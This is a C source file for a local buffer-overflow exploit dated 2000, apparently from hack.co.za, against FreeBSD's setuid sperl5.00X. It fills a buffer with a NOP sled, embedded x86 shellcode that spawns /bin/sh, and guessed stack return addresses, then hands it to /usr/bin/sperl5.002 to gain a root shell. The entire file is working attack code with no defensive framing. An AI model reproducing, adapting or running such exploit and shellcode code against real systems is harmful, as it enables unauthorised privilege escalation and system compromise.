/************************************************************/
/*   Exploit for FreeBSD sperl5.00X by OVX            [2000]*/
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          1000

char *get_esp(void)
{
  asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
  int i;
  char execshell[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

  for(i=0;i<BUFFER_SIZE-4;i+=4)
    *(char **)&buf[i] = get_esp() - OFFSET;

  memset(buf,0x90,768);
  memcpy(&buf[768],execshell,strlen(execshell));

  buf[BUFFER_SIZE-1]=0;

  execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
}
/*                    www.hack.co.za              [2000]*/